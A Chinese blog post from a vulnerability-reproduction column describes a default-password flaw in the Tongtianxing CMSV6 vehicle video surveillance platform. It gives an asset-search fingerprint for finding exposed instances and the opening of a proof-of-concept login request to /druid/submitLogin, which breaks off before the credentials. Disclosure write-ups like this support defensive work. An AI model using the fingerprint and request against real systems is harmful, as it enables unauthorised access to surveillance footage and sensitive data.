通天星CMSV6车载视频监控平台默认口令漏洞

今天晚上早睡觉

已于 2024-03-28 15:15:20 修改

阅读量134

点赞数

分类专栏：漏洞复现文章标签： web安全

于 2024-03-28 14:53:13 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/137112094

版权

漏洞复现专栏收录该内容

361 篇文章 130 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

产品简介

通天星CMS V6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMS V6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台，通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用于家居看护、商铺远程监控、私家车的行驶分享仪上等。

漏洞概述

通天星CMS V6车载视频监控平台存在默认口令。通过利用此漏洞，攻击者可能获得系统内的敏感信息，导致潜在的信息泄露风险。

漏洞指纹

hunter：web.body=”./open/webApi.html

漏洞复现

Poc

POST /druid/submitLogin HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded; charset=UT